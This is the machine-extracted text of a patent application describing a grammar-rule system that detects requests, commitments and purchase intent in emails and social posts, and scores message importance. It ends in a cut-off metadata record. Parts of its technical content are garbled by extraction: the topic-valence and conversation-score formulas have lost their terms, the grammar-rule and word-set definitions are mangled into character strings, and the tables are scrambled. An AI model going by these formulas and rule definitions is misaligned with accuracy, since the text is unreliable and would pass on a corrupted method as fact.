Once the tokenized text has been segmented, in the third step the sentences or phrases obtained from segmentation are parsed for grammar 210. Parsing identifies the grammatical structure of sentences, i.e., which groups of words go together such as a phrase, the tagged parts of speech, and the words that are the subject or object of the verb phrase. Once the grammatical structure has been derived, the meaning of the sentence is possible based on the application of relevant grammar rules.
The grammar rules 130 to be applied are defined by the event 120 that is to be detected. Since grammar for natural languages can be ambiguous, a sentence or phrase can have multiple possible analyses and therefore meanings. By applying rules of grammar that are specific to the event, the meaning behind the sentence can be derived. In this application, a grammar rule therefore refers to the rule or condition that a
sequence of parsed text must satisfy to indicate an event or intent category. Thus, a grammar rule can specify that the parsed units in the text, such as noun, verb phrases, or adjective, and their combinations meet certain predefined conditions and values. It can include determination of the subject of the verb and the person, 1st, 2nd or 3rd, of the subject and object.
In many cases, the event or intent detection may include event signals 140. These signals may be independent of the grammar rule conditions. For example, if the intent to be detected is a promise by the sender of a message or post, such as, “I will be going”, then an intent to go on a certain day would look for a date or day, such as “today”, “tomorrow”, or “Tuesday”. Thus, a commitment intent to go on a certain day would be detected if the grammar rule detects a commitment involving “going” or “traveling” and a co-located mention of a day such as specific weekday, (Monday through Sunday), or today or tomorrow. The latter condition on the day would be checked by the event detection logic that analyzes both the output of the parser 210 and the event signals 140.
In addition to the use of event signals, the event detection logic may check for a match of the noun phrases with predefined key phrase of interest. Key phrases of interest refer to specific topics or names of entities, including persons, places, locations, products, or services.
There are at least two possible implementations of the event detection analytics module 105. The first includes parsing 210 with grammar rules 130 as shown in FIG. 2. Alternately, as shown in FIG. 3, the event detection analytics module 105 can be built without need for parsing but only use an event detection logic 150 on the parsed text units. Thus, detecting any event about an entity such as a smartphone would require getting the output of the segmentation 202 and doing a match on the noun phrases with the specific smartphone. No grammar rules may be required.
For complex event detection, event detection analytics 105 will include a parser 210 and grammar rules 130. One approach to deriving grammar rules 105 from an event definition 120 is shown in the flowchart of FIG. 4.
Event detection 120 will typically include explicit specification of the type of event to be detected, i.e., what type of actors are involved in what action or an action that occurred in nature. This can include an event definition of the type: an intent like a question being asked of the receiver, a commitment intent by the sender or poster of the message relating to an interest in purchasing a specified item, to the occurrence of rain. Once the event is specified, different possible linguistic constructs are considered. This can include well-known primary language constructs 410 that describe the event using action verbs representing the event. It can include linguistic constructs 430 description which includes synonymous expressions of the primary construct with use of sentences or phrases that indicate similar or equivalent descriptions of the event. Alternate constructs 430 can also include colloquial or ad hoc idiomatic expressions. Another form of language constructs would be from a corpus comprising examples of language constructs that indicate the event and collected from actual user feedback 410.
Once the set of language constructs have been compiled, they are analyzed for common grammar constructs to identify common patterns such as frequently observed n-grams sequences, common verb phrases, and associated parts of speech values. This analysis step then categorizes 440 the complied constructs into a set of common grammatical constructs 440. Each set of common grammatical construct is converted into a formal grammar rule.
One desired constraint in creating the set of grammar rules is to select the minimal set of rules required for the event detection. Using the minimal number of grammar rules ensures the most efficient parsing of the text and the application of grammar rules. Having the smallest set of grammar rules not only results in the shortest processing time in event detection but also reduces the memory footprint. This in turn enables running the event detection system on a single computing device such as a smartphone, a computer tablet, or a client computer such as an email client.
A number of embodiments of the event detection, especially intent detection, in emails or any text, have been implemented as shown in the demo web site page shown in FIG. 5. The embodiments in this demo web site include a web HTTP API, a smartphone library such as for a commercial operating system as Android®, and for an email client such as Microsoft Outlook®.
An efficient event detection processing system allows implementation across many different devices, from a smartphone to a server. These different embodiments are now described in FIGS. 6 to 9.
FIG. 6 shows an embodiment of a special case of event detection, intent detection for emails, in a smartphone. In this embodiment, the email client application 600 that runs on a mobile phone operating system 650, such as Android®, is modified to include the event detection analytics module 630. As with all email clients, the client application fetches and stores email locally using IMAP or POP3 protocols without user supervision. Upon receiving new emails of interest 610, the analytics gives them a score 615 depending on the confidence level of detecting intent such as a question or request, or commitment or promise. In addition, the embodiment may allow the user to review the intent score or flag and provide feedback 620 to the client. The feedback can then be used to update the grammar rules 130 and/or event detection logic 150 for accuracy improvement.
FIG. 7 shows event detection analytics powering an API 700 running on web application platform 750. The API 700 can be called over HTTP 710 to analyze text for a given source. As with the previous embodiment the event detection analytics analyzes the email and assigns the score for the intent. As with the other embodiments, the event detection analytics 630, grammar rules 130 and/or event detection logic 150, can be updated with each API call and stored on the server with user feedback 620 without any user supervision.
FIG. 8 shows event detection analytics 630 used within a web mail, such as Gmail® contextual plug-in 800. The email 610 is provided to the plug-in 800 by the API 700 as in the case of the web API described in FIG. 7. The API 700 assigns the score for the intent and provides the result to the user via the plug-in 800. User feedback 820 is provided by the plug-in 800 to the API 700 to update the event detection analytics 630.
FIG. 9 shows event detection analytics 630 powering an SMTP endpoint 910 running on a web application platform 850 for implementing an email web robot or bot 1000. The bot 1000 is called over SMTP 910 to analyze text in the body of email. As before the event detection analytics 630 calculates the intent score when an intent is detected. The event detection analytics 630 can be updated with each SMTP call and stored on server with user feedback 620.
Having summarily described some embodiments of the devices and methods, more detailed descriptions will now be provided. The methods and devices described herein may be used in the following applications:
- Email including email on smart phones and desktop email;
- Web based API for general web applications, including CRM, social media marketing and engagement; and
- General event detection such as sensitive information or data leak protection (DLP).
Described herein and as shown in FIGS. 1-4 are techniques for a generalized intent detection system, including an email analysis system. Although the approach uses email and messaging systems as an example, it is directly applicable to any electronic posts or communication such as social media posts, comments, and chat. In the following description, for purposes of explanation, numerous examples and specific details are set forth in order to provide a thorough understanding of embodiments of the present invention. Particular embodiments as defined by the claims may include some or all of the features in these examples alone or in combination with other features described below, and may further include modifications and equivalents of the features and concepts described herein.
Email Message Intent Detection Approach
Particular embodiments analyze emails so as to detect:
- Action Item or Request Emails—those that have questions or requests from a sender for the user and needs a response;
- Commitment Emails—the counterpart to Action Items—those in which the sender promises or offers to complete or execute an action; and
- Intent to Purchase—e.g., of a special derivative case of Commitment that uses Commitment Detection logic and other signals to build this Intent Detection.
Particular embodiments identify many different types of email based on a number of factors. Thus, in addition to identifying which emails should be flagged as Action Item or Commitment that the user needs to read, particular embodiments also identify messages that are important to the user. While there are many possible factors that determine what messages are important to the user, there are some criteria that are used in defining importance. Some key factors that determine importance of a message may include:
- Sender: not all senders are equally important; every user has key working or subordinate or personal relationships with few contacts. The user has frequent conversations with these contacts. Therefore, messages from these contacts may have higher priority than those from other contacts. Further, even among contacts that the user converses with, there will be a relative order of importance.
- Content Topics: there may be explicit topics that the user may be discussing currently that will take precedence over topics that were discussed in the past. For example, the user may be discussing a current client’s project that may be evident in recent emails but not a completed project that had been a topic of discussion in the past.
- Unstated Intent: there may be implicit topics or intent that the user may be considering that are not expressed in the user’s message content. For example, if the user is planning vacation travel to a given destination, the user may be interested in a promotional email from an airline offering a discount to that destination, even if the user is normally not interested in such offers.
Given the above criteria of importance and the expectation that the user will usually respond to questions in messages or track responses by his contacts of whom the users has asked questions, the analysis system may track the following to determine which emails the user will want to read or respond to:
1. Content—using a number of indicators that include but not limited to:
- a. Keywords that identify action verb or verb phrases or commitment words or phrases, as well as special cases such as commitment to purchase or buy;
- b. Grammar rules that identify if a sentence or phrase within the email body contains an action item or commitment;
- c. Elimination of false positives by identifying verb or verb phrases that do not connotate action items or commitments.
2. Sender—using a number of indicators that include, but are not limited to:
- a. Importance of the senders: senders with which the user has had conversations;
- b. Relative importance based on response latency: how quickly the user responds to the sender.
3. Topic or Context—using a number of indicators that include, but are not limited to:
- a. Current topic of discussions that user is interested in;
- b. Decreasing interest over time in a topic if there has been no mention in recent conversation;
- c. Key interest phrase: the key interest phrase is a text phrase that indicates the context or more specifically, the entity names of the intent to be detected.
The importance may be based on the above factors being quantified. Importance may be determined based on a threshold.
Intent Detection Implementation
The intent detection architecture that includes the messaging analysis system described herein can be implemented in any email client device or in a server, or can be functionally split across the client and the server. A few example implementations are as follows:
1. Analytics running on the client device as shown in FIG. 6: all email processing functions from analytics to user actions or follow-up activities may be contained in the client. More details on these actions and follow-up activities are described below.
2. Analytics running on the server as shown in FIG. 8: all email processing functions from analytics to user actions or follow-up activities may be done by the server.
3. Analytics on server and synchronization across multiple client devices: all email processing functions from analytics to user actions or follow-up activities may be done by the server, and a user management...
module may manage synchronization of the user’s actions and follow-ups across multiple messaging client devices.
Email Priority Analysis System
[0088] The priority email analysis rates the relative importance of user's incoming email messages. This is done by the event detection analytics component. The importance ratings assigned by the analysis component can then used to automatically highlight the important messages, or those messages in which request intent or commitment intent are detected.
[0089] The criteria by which the analysis component rates message importance will be described below. In the embodiments described herein, the analysis component is divided into three sub-components, which independently assign an importance score to each given message, based on different types of features. The sub-components are listed as follows:
[0090] Content Analysis—analysis of important terms (tokens) that occur in the body and subject of a message.
[0091] Conversation Analysis—analysis of the patterns of prior conversation between the message sender and the user.
[0092] Surface Analysis—analysis of (pre-defined) features in the body of the message, such as “urgent” or “!” (exclamation mark), message length, etc.
[0093] The overall message importance score can be a function such as an aggregated composite (e.g., an arithmetic sum) of the three scores returned by each of the sub-components.
[0094] Each sub-component is first trained on a sufficient (~100-500) number of most recent messages (“training set”) in the inbox and outbox of the user. This yields a data model for each sub-component; models should be periodically retrained. Subsequently, new incoming messages can be evaluated using these models.
[0095] To summarize, each sub-component has two main public methods:
[0096] Model.trainModel (Inbox, Outbox)—training
[0097] float.rateMessage (Message, Model)—evaluation
[0098] A detailed description of different email analysis components is provided in Section 3.
Analytics Components
[0099] The analytics components may include the following components:
[0100] Action Detector
[0101] Commitment Detector
[0102] Topic Analysis
[0103] Conversation Analysis
[0104] Interaction Analysis
[0105] Repeated Text Detector
[0106] Tokenizer
Action Detector
[0107] The action detector is a module responsible for detecting action items (i.e., intents of questions or requests) in the email messages. Examples of these questions/requests are:
[0108] “Did you get my last message?”
[0109] “Please send me an update.”
[0110] “Let’s work on this tomorrow.”
[0111] Detected action items can be used to determine message importance. When intent is detected in a message, the text of that message is highlighted by the user interface to provide the indication to the email recipient.
[0112] The action detector is initialized with the grammar rules that are a key component of the event detection analytics described earlier in FIGS. 1-3.
Grammar Rules
[0113] Examples of grammar rules used to detect an action item intent are as follows:
[0114] \texttt{?:Verb=‐send|work|email}
[0115] \texttt{0115} \\texttt{+did you_Verb * ?)
[0116] \texttt{+please_Verb}
[0117] \texttt{+let’s_Verb}
[0118] \texttt{During initialization, the action detector builds an internal data structure corresponding to the grammar rules.}
[0119] \texttt{When a new message is received for analysis, the Action Detector first calls the Tokenization unit to split the message into tokens, and then it scans the resulting sequence of tokens for matching patterns specified by the grammar rules. The list of matching patterns (and their corresponding location(s) in the message) is returned.}
Commitment Detector
[0120] The commitment detector is a module responsible for detecting commitments, i.e., statements made by the sender that imply a promise or a commitment in the email messages. Examples of commitments are:
[0121] “I will look into this.”
[0122] “Let’s meet next week.”
[0123] “Tuesday works for me.”
[0124] The commitment detector works like Action Detector described earlier, except that it is initialized with a different set of grammar rules designed for detecting commitments.
Topic Analysis
[0125] Topic Analysis determines importance based on the presence of important terms that comprise a topic. Detected topics can be used to determine message importance and/or highlighted by the user interface.
[0126] The set of topics and their associated valence scores are determined statistically during training the Topic Analysis on a set of existing email messages.
[0127] At a high level, the valence scores are determined by the difference of probabilities of being in the outgoing messages versus incoming messages (i.e., words in the outgoing messages are used as a proxy of what is important to the user).
[0128] More specifically:
\[
\text{score} = \frac{\text{count}(\text{message}) - \text{count}(\text{message})}{\text{count}(\text{message}) + \text{count}(\text{message})}
\]
\(\oplus\) indicates text missing or illegible when filed.
[0129] This results in a score between 1.0 and -1.0. The higher the score, the more likely a term is to appear in the outgoing messages, and thus the higher it is its importance. Conversely, if the term occurs in the incoming messages, but not in outgoing messages, it is probably less important (i.e., messages containing the term are more often ignored).
Words in a predefined stopword list, as well as a custom blacklist are excluded from consideration. Morphological variants ("runs", "running") are collapsed into the canonical form ("run"), using a stemming table for common words. Tokens are treated in a case-insensitive way. The importance of a (new) email message E (and given Topic Analysis model M) is simply the sum of the scores of the valence scores for topics present in the model, possibly normalized by the total length of the message:
\[
\text{importance}(E) = \sum \text{importance topics(E)}
\]
The raw message topic score is normalized by mean and standard deviation of importance scored calculated from the messages in the training set.
Conversation Analysis
Conversation Analysis determines the importance of a message based on the past patterns of email exchange between the user and the sender of a given message. The Conversation Analysis model contains a list of email addresses (senders) and the corresponding importance score. The importance score of an email address is proportionate (among other factors) to the difference between the fraction of the outbound messages in the training set sent to the email address and the fraction of the inbound messages received from a given address, i.e.:
\[
\frac{\text{count}(2)}{\text{size(outbox)}} - \frac{\text{count}(3)}{\text{size(inbox)}},
\]
The conversation analysis score of a new inbound message is simply the importance score of its sender.
The raw conversation score for a new message is normalized by mean and standard deviation calculated from the inbound messages in the training set.
Interaction Analysis
Interaction Analysis is used to help predict the importance of certain conversations, topics or persons, based on the past patterns of user interaction (i.e., actions taken with email user interface) on relevant messages. The Interaction Analysis model takes into account features like:
- Time taken to open with respect to other email reading behavior.
- Time message remained "open" on device.
- How many times that email was opened before taking an action.
- Action taken after reading the message.
Repeated Text Detector
Repeated Text Detector is designed to detect regions of text that are repeated across emails from certain senders (e.g., corporate template, legal disclaimer). These repeated regions are unlikely to contain new information and are excluded from consideration by Action Detector, Commitment Detector and Topic Analysis. Repeated Text Detector keeps a record of the messages with the highest length such that they are treated as having high priority. If a line is seen more than a minimum number of times in messages from a given user, those lines are considered repetitive. Given a new email message, Repeated Text Detector finds regions that are repeated thus, and should be ignored.
Tokenizer
Tokenizer takes the text of a message or any online posts, and returns a sequence of tokens corresponding to words, punctuation symbols, and special symbols (e.g. start of sentence in the message). These token sequences are used by other modules (such as Action Detector) to perform analysis.
Email Scoring
The determination of whether an email is flagged (for an Action Item or a Commitment) is based on a function of different scores.
Three components are used currently to determine whether an email is flagged:
- Conversation Score—score from the analysis of the patterns of prior conversation between the message sender and the user
- Surface Score—score from the analysis of (pre-defined) features in the body of the message, such as "urgent" or "!", message length, etc.
- Content Score—score from the analysis of important terms (tokens) that occur in the body & subject of a message
As described earlier, the scores are defined as follows:
- Conversation Score: normalized score that indicates if there has been prior conversation between User and the Sender. Score is higher when there is more exchange of email between User and Sender. The score would be 0 if the User never responds or replies to the email from the Sender. High scores indicate that is important to the User. Conversation score of a Sender can be a time-dependent function since the importance of a Sender can increase or decrease over time.
- Surface Score: normalized score that indicates there is a "speech act" in the body of the received email body, or in the header if the initial (i.e., not the reply) had a question or a response request from the Sender for the
User. Surface score is independent of the Sender and independent over time since it is only based on “tokens” in the received email body.
[0161] Content_Score: indicates that the received email contains words or phrases related to current topics that the User is interested in. Current topic of interest is determined by the related tokens that occur with highest frequency. Content score of a topic is usually a decaying function of time especially as new topics surface in the email conversations.
[0162] All scores may be normalized to values between 0 and 1.
Flagging Important Emails
[0163] There are many ways to flag important messages and emails. Here we include two implementations for illustration. In the first case, all emails are flagged with specific symbols or flags on the client email display:
[0164] : represents an Action Item email which contains a question or request that needs a response from the user
[0165] : represents an Important email that would be of interest to the user but no Action is expected of the user
[0166] : represents a FYI (for your information) email where no action is required, and may not be of interest to the user—it may be deferred for later reading and to dispense with as the user chooses, including deleting
[0167] FIG. 10 shows the logic table for the determination of email status flags, after intent detection analytics has been executed on the emails.
[0168] The definition for the status value of the Flag is based on the following assumptions:
[0169] The Flag is set to Action Item only if both Surface_Score and Conversation_Score are both high.
[0170] The Flag is set to Important if Content_Score is high and either the Surface_Score (action required) or the Conversation_Score (Sender is important) is high.
[0171] All other cases indicate that the email is not important and the flag is set to FYI.
[0172] The logic assumed above is based on one interpretation of how emails may be marked or flagged. Examples of the usage of such flags are shown for an embodiment for a desktop email client in FIG. 11 and for a smartphone in FIG. 13. There may be many other ways of flagging the emails that are important to the user.
[0173] Example embodiments of where the text of a message is highlighted when an intent is detected are shown for two embodiments: FIG. 12 shows highlighting of an action item for a smartphone in FIG. 12, for an email bot in FIG. 16, and for a web mail client in FIG. 17.
Dashboard: Access to Emails, Schedules, etc.
[0174] Because different users access their emails differently, particular embodiments have built an email dashboard for users to access email by different criteria. As shown in FIG. 8, a user can access emails by the following categories:
[0175] All Emails—the traditional view as shown in the embodiment for a desktop email client in FIG. 11 and for a smartphone in FIG. 13.
[0176] Action Items—sorted by those that have been flagged to have action items as shown in the smartphone embodiment of FIG. 14.
[0177] Waiting Response—those emails where the User has sent an Action Item and is waiting for a response, such as a commitment, from the recipient. This also includes emails that have been delegated by the User to a Contact and where the User is awaiting a follow-up from the Contact as shown in the smartphone embodiment of FIG. 14.
[0178] Deferred—those emails that had action items that the user still needs to respond to since he/she has deferred the response as shown in the smartphone embodiment of FIG. 14.
[0179] Important Contacts—sorted by the Contacts most important to the User, i.e., those Contacts with whom the User has the most conversations as shown in the smartphone embodiment of FIG. 15.
[0180] Topics—organized by common topics of discussion in the email.
[0181] FIG. 15 shows examples of how some of the above categories of emails are assembled with both automation and analytics executed and with input from the user. Action Items and Delegating Response are not described below. Deferred and Delegated Emails and the Important Contacts view are instead described.
Deferred or Delegated Emails
[0182] Emails can be deferred by the User on detection of an Action Item. This is one of the options presented as shown in the smartphone embodiment of FIG. 12.
Important Contacts View
[0183] Another common view that is desired by user is to view emails from the user’s most Important Contacts, the contacts the user has the most frequent conversations via email.
[0184] Because particular embodiments analyze Conversations by Contact using the Conversation Analysis, it can automatically sort the most important contacts, and also show Unread emails from the Contact, Action Items owed to the User. Emails deferred to the Contact, emails to the Contact that the User is awaiting a response, and emails sorted by Topics.
Event Detection web-based API
[0185] Besides the embodiment for email applications, another class of embodiments is a web based API. An embodiment of this is shown in FIG. 18. Another application of integrating such an API is when online posts on a web site including posts on a social media site are analyzed for intent detection. One such embodiment of detecting the action item or commitment intents for posts on a social media website is shown in FIG. 19.
Special application for Intent Detection for CRM
[0186] A special case of using event and intent detection is in the case of customer support. Sales personnel are in frequent email communication with existing or prospective customers containing questions and commitments to follow up. The customer support department usually sends initial response within 2-3 hours of first receiving email acknowledging the issue and if possible, some kind of workaround or resolution and follow up with detailed response within a day. Intent detection analytics can be used to detect question from customers by support personnel in incoming emails. It can also be used to track the commitments made by support personnel to customers. By using intent detection together with topic detection allows the customer support department to build an email plug-in that can surface high risk emails
allowing personnel to respond to them quicker. Upon responding, customer support supervisor can pull out a report of all commitments made by personnel and get better view of current status. FIG. 20 shows an embodiment of a dashboard that is used to track issues raised by customers and commitments made by personnel for a given customer over a timeline.
An Illustrative Example of Processing for Event Detection Analytics
[0187] A simple limited example of how an event detection analytics system is set up for a predefined event is now provided. The steps used in the process to derive the event detection logic are shown in FIGS. 2 and 4. Event: message sender intends “to buy a computer” Data Sources: email and social media posts
[0188] In this example it will be assumed that process for text extraction 100, tokenization 201, and segmentation 202 of the email or post text from the data source has been done. The primary steps in setting up the analytics are those that define the event detection logic 150.
[0189] The event definition 120 in FIG. 4 requires defining different constructs for the event where the sender expresses intent to purchase a computer.
[0190] To create a number of primary constructs 420, and limiting only to those in this example, the following simple expressions are considered:
[0191] “We will get a laptop.”
[0192] “I could order a Mac online.”
[0193] “Gonna buy a computer today.”
[0194] As part of the process to categorize the primary constructs 440, different verb expressions related to “buying” are considered. The set of verbs related to buying or “purchasing” may include a list synonyms and equivalent expressions. The following set “purchases” is an example:
```
<table>
<thead>
<tr>
<th>WeSimple</th>
<th>Will</th>
<th>WeFuture</th>
<th>Articles</th>
</tr>
</thead>
<tbody>
<tr>
<td>gonna purchase</td>
<td>Wanna purchase</td>
<td>buy</td>
<td>the</td>
</tr>
</tbody>
</table>
```
[0195] Similarly, the set of nouns describing the computer may include all forms of “computer”. The following set “computer” is an example:
```
<table>
<thead>
<tr>
<th>JWeSimple</th>
<th>Will</th>
<th>JWeFuture</th>
<th>Articles</th>
</tr>
</thead>
<tbody>
<tr>
<td>computer</td>
<td>computer</td>
<td>laptop/netbook/notebook/desktop/PC/Mac</td>
<td></td>
</tr>
</tbody>
</table>
```
[0196] Based on the above, a simple set of grammar rules 450 would include:
[0197] JWeSimple\_Will\_purchase\_Articles\_computer
[0198] JWeFuture\_purchase\_Articles\_computer
[0199] JWeWould\_purchase\_Articles\_computer
[0200] PHASE\_START\_JWe\_going\_to\_purchase\_Articles\_computer
[0201] PHASE\_START\_JWe\_gonna\_purchase\_Articles\_computer
[0202] PHASE\_START\_JWe\_wanna\_purchase\_Articles\_computer
[0203] PHASE\_START\_JWe\_want\_to\_purchase\_Articles\_computer
[0204] The above form of the grammar is based on the syntax the parser uses to process the message or post. In the above the different sets such as JWeSimple refer to word sets used for pronouns, verbs forms and articles and are defined as:
[0205] JWeSimple=\_i\_we\_ll
[0206] JWeFuture=\_i\_ll\_we\_ll
[0207] JWe=\_i\_we\_l\_we\_d\_i\_li\_m\_we\_rel\_i\_ll\_we\_ll\_m\_i\_we\_re
[0208] Will=\_i\_ll\_w\_i\_ll\_s\_l\_i\_ll\_should=\_c\_ould
[0209] Articles=\_a\_i\_n\_the
[0210] The event detection logic 150 in FIG. 2 that uses the above set of grammar rules correctly identifies the intent to buy a computer as per the examples that were listed earlier. The above example serves to illustrate how the method described herein is used to set up the analytics for event detection. Based on the foregoing analysis, the system may output an indication that the sender of the message intends to buy a computer.
Embodiment Approach
[0211] FIG. 21 illustrates an example of a special purpose computer system 2000 configured with an event detection system according to one embodiment. Computer system 2000 includes a bus 2002, network interface 2004, a computer processor 2106, a memory 2108, a storage device 2110, and a display 2112. Computer processor 2106 may execute computer programs stored in memory 2108 or storage device 2110. Any suitable programming language can be used to implement the routines of particular embodiments including C, C++, Java, assembly language, etc. Different programming techniques can be employed such as procedural or object oriented. The routines can execute on a single computer system 2000 or multiple computer systems 2000. Further, multiple processors 2106 may be used.
[0212] Memory 2108 may store instructions, such as source code or binary code, for performing the techniques described above. Memory 2108 may also be used for storing variables or other intermediate information during execution of instructions to be executed by processor 2106. Examples of memory 2108 include random access memory (RAM), read only memory (ROM), and any other medium from which a computer can read.
[0213] Storage device 2110 may also store instructions, such as source code or binary code, for performing the techniques described above. Storage device 2110 may additionally store data used and manipulated by computer processor 2106. For example, storage device 2110 may be a database that is accessed by computer system 2000. Other examples of storage device 2110 include random access memory (RAM), hard drive, a magnetic disk, an optical disk, a CD-ROM, a DVD, a flash memory, a USB memory card, or any other medium from which a computer can read.
[0214] Memory 2108 or storage device 2110 may be an example of a non-transitory computer-readable storage medium for use by or in connection with computer system 2000. The computer-readable storage medium contains instructions for controlling a computer system to be operable to perform functions described by particular embodiments. The instructions, when executed by one or more computer processors, may be operable to perform that which is described in particular embodiments.
[0215] Memory 2108 or storage device 2110 may be an example of a non-transitory computer-readable storage medium for use by or in connection with computer system 2000. The computer-readable storage medium contains instructions for controlling a computer system to be operable to perform functions described by particular embodiments. The instructions, when executed by one or more computer processors, may be operable to perform that which is described in particular embodiments.
[0216] Computer system 2000 includes a display 2112 for displaying information to a computer user. Display 2112 may display a user interface used by a user to interact with computer system 2000.
[0217] Computer system 2000 also includes a network interface 2004 to provide data communication connection over a network, such as a local area network (LAN) or wide
area network (WAN). Wireless networks may also be used. In any such implementation, network interface 2004 sends and
receives electrical, electromagnetic, or optical signals that carry digital data streams representing various types of infor-
mation.
[0218] Computer system 2000 can send and receive information through network interface 2004 across a network
2114, which may be an Intranet or the Internet. Computer system 2000 may interact with other computer systems 2000
through network 2114. In some examples, client-server communications occur through network 2114. Also, implemen-
tations of particular embodiments may be distributed across computer systems 2000 through network 2114.
[0219] The methods described above may be performed by a computer by running computer-readable instructions. The methods may also be performed using an ASIC or other device.
[0220] As used in the description herein and throughout the claims that follow, “a,” “an,” and “the” includes plural refer-
ences unless the context clearly dictates otherwise. Also, as used in the description herein and throughout the claims that
follow, the meaning of “in” includes “in” and “on” unless the context clearly dictates otherwise.
[0221] The above description illustrates various embodiments of the present invention along with examples of how aspects of the present invention may be implemented. The above examples and embodiments should not be deemed to be the only embodiments, and are presented to illustrate the flexibility and advantages of the present invention as defined by the following claims. Based on the above disclosure and the following claims, other arrangements, embodiments, implementations and equivalents may be employed without departing from the scope of the invention as defined by the claims.
What is claimed is:
1. A method for analyzing text, said method comprising: providing first text in a computer-readable format;
tokenizing the first text to yield units of the first text; segmenting the units of first text to yield second text;
parsing the second text to yield parsed second text; correlating at least one grammar rule to the parsed second
text; providing a message as to the purpose of the first text based on the at least one correlated grammar rule.
2. The method of claim 1, wherein providing a message comprises providing an indication message as to the purpose
of the first text based on the at least one correlated grammar rule.
3. The method of claim 1 wherein the purpose includes an inquiry.
4. The method of claim 1 wherein the purpose includes a predetermined event.
5. The method of claim 1, wherein the purpose includes a specific action.
6. The method of claim 1, wherein the purpose includes an intent to perform a specific action.
7. The method of claim 1, wherein the purpose includes predetermined information related to a named entity.
8. The method of claim 1, wherein the at least one grammar rule includes a predetermined sequence of units.
9. The method of claim 1, wherein the at least one grammar rule includes a predetermined combination of units.
10. The method of claim 1 and further comprising analyzing the parsed second text based on at least one correlated
grammar rule to detect specific information related to the purpose.
11. The method of claim 10, wherein the specific information relates to the time.
12. The method of claim 10, wherein the specific information relates to entities related to the purpose.
13. The method of claim 10, wherein the specific information relates to the location of the purpose.
14. The method of claim 10, wherein the specific information relates to the sentiment of the second text.
15. The method of claim 1, wherein the purpose relates to an intent to purchase an item.
16. The method of claim 14, and further comprising analyzing the parsed second text to determine the item that is
tended to be purchased.
17. The method of claim 1, wherein the purpose relates to the dissemination of information.
18. The method of claim 17, and further comprising analyzing the parsed second text to determine the topic of the
information.
19. The method of claim 17, wherein the information is related to at least one predetermined named entity.
20. A method for analyzing text, said method comprising: providing first text in a computer-readable format;
tokenizing the first text to yield units of the first text; segmenting the units of first text to yield second text;
parsing the second text to yield parsed second text; correlating at least one grammar rule to the parsed second
text; and providing a message as to the purpose of the first text based on the at least one correlated grammar rule; wherein the message comprises providing an indication as to the purpose of the first text based on the at least one correlated grammar rule; wherein the purpose may include a predetermined event, an inquiry, a specific action, an intent to perform a specific action; and
disseminating the information related to a named entity or time or location or sentiment.
|
{"Source-Url": "https://patentimages.storage.googleapis.com/a2/45/53/b2c9ade282af7f/US20120245925A1.pdf", "len_cl100k_base": 12763, "olmocr-version": "0.1.49", "pdf-total-pages": 31, "total-fallback-pages": 0, "total-input-tokens": 40183, "total-output-tokens": 14332, "length": "2e13", "weborganizer": {"__label__adult": 0.0003578662872314453, "__label__art_design": 0.0006489753723144531, "__label__crime_law": 0.000904083251953125, "__label__education_jobs": 0.0018463134765625, "__label__entertainment": 0.00021469593048095703, "__label__fashion_beauty": 0.00019550323486328125, "__label__finance_business": 0.002712249755859375, "__label__food_dining": 0.00024819374084472656, "__label__games": 0.0011587142944335938, "__label__hardware": 0.0023651123046875, "__label__health": 0.0002846717834472656, "__label__history": 0.00021958351135253904, "__label__home_hobbies": 0.0001348257064819336, "__label__industrial": 0.0003638267517089844, "__label__literature": 0.0006737709045410156, "__label__politics": 0.00026416778564453125, "__label__religion": 0.0002980232238769531, "__label__science_tech": 0.0489501953125, "__label__social_life": 0.00014197826385498047, "__label__software": 0.2291259765625, "__label__software_dev": 0.70849609375, "__label__sports_fitness": 0.00012755393981933594, "__label__transportation": 0.0003123283386230469, "__label__travel": 0.0001251697540283203}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 58558, 0.03559]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 58558, 0.46302]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 58558, 0.91209]], "google_gemma-3-12b-it_contains_pii": [[0, 615, false], [615, 615, null], [615, 624, null], [624, 633, null], [633, 769, null], [769, 1505, null], [1505, 1505, null], [1505, 1514, null], [1514, 1714, null], [1714, 1723, null], [1723, 2414, null], [2414, 2892, null], [2892, 3064, null], [3064, 3074, null], [3074, 3084, null], [3084, 3098, null], [3098, 3546, null], [3546, 3880, null], [3880, 4182, null], [4182, 4676, null], [4676, 4686, null], [4686, 4696, null], [4696, 11404, null], [11404, 17562, null], [17562, 24758, null], [24758, 30684, null], [30684, 36117, null], [36117, 40642, null], [40642, 46855, null], [46855, 53506, null], [53506, 58558, null]], "google_gemma-3-12b-it_is_public_document": [[0, 615, true], [615, 615, null], [615, 624, null], [624, 633, null], [633, 769, null], [769, 1505, null], [1505, 1505, null], [1505, 1514, null], [1514, 1714, null], [1714, 1723, null], [1723, 2414, null], [2414, 2892, null], [2892, 3064, null], [3064, 3074, null], [3074, 3084, null], [3084, 3098, null], [3098, 3546, null], [3546, 3880, null], [3880, 4182, null], [4182, 4676, null], [4676, 4686, null], [4686, 4696, null], [4696, 11404, null], [11404, 17562, null], [17562, 24758, null], [24758, 30684, null], [30684, 36117, null], [36117, 40642, null], [40642, 46855, null], [46855, 53506, null], [53506, 58558, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 58558, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 58558, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 58558, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 58558, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 58558, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 58558, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 58558, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 58558, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 58558, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 58558, null]], "pdf_page_numbers": [[0, 615, 1], [615, 615, 2], [615, 624, 3], [624, 633, 4], [633, 769, 5], [769, 1505, 6], [1505, 1505, 7], [1505, 1514, 8], [1514, 1714, 9], [1714, 1723, 10], [1723, 2414, 11], [2414, 2892, 12], 